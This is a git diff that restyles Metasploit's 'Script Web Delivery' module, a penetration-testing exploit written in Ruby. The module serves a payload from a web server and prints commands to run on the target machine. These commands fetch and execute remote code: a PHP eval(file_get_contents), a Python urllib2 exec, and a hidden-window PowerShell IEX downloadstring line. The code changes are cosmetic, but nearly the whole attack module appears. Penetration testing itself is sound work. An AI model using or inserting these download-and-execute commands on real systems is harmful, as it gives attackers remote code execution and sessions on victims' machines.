diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index 85eeb5df68..acd58604c6 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, 'Name' => 'Script Web Delivery', - 'Description' => %q{ + 'Description' => %q( This module quickly fires up a web server that serves a payload. The provided command will start the specified scripting language interpreter and then download and execute the payload. The main purpose of this module is to quickly establish a session on a target @@ -25,13 +25,13 @@ class Metasploit3 < Msf::Exploit::Remote escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines. - }, + ), 'License' => MSF_LICENSE, 'Author' => [ 'Andrew Smith "jakx" ', 'Ben Campbell', - 'Chris Campbell' #@obscuresec - Inspiration n.b. no relation! + 'Chris Campbell' # @obscuresec - Inspiration n.b. no relation! ], 'DefaultOptions' => { @@ -39,12 +39,12 @@ class Metasploit3 < Msf::Exploit::Remote }, 'References' => [ - [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'], - [ 'URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/' ], - [ 'URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'], - [ 'URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'] + ['URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'], + ['URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/'], + ['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'], + ['URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'] ], - 'Platform' => %w{python php win}, + 'Platform' => %w(python php win), 'Targets' => [ ['Python', { @@ -62,38 +62,38 @@ class Metasploit3 < Msf::Exploit::Remote ['PSH_x64', { 'Platform' => 'win', 'Arch' => ARCH_X86_64 - }], + }] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 19 2013' )) end - def on_request_uri(cli, request) - print_status("Delivering Payload") - if (target.name.include? "PSH") + def on_request_uri(cli, _request) + print_status('Delivering Payload') + if target.name.include? 'PSH' data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded) else - data = %Q|#{payload.encoded} | + data = %Q(#{payload.encoded} ) end - send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) + send_response(cli, data, 'Content-Type' => 'application/octet-stream') end def primer - url = get_uri() - print_status("Run the following command on the target machine:") + url = get_uri + print_status('Run the following command on the target machine:') case target.name - when "PHP" + when 'PHP' print_line("php -d allow_url_fopen=true -r \"eval(file_get_contents('#{url}'));\"") - when "Python" + when 'Python' print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"") - when "PSH_x86", "PSH_x64" + when 'PSH_x86', 'PSH_x64' download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))" - print_line generate_psh_command_line({ - :noprofile => true, - :windowstyle => 'hidden', - :command => download_and_run - }) + print_line generate_psh_command_line( + noprofile: true, + windowstyle: 'hidden', + command: download_and_run + ) end end end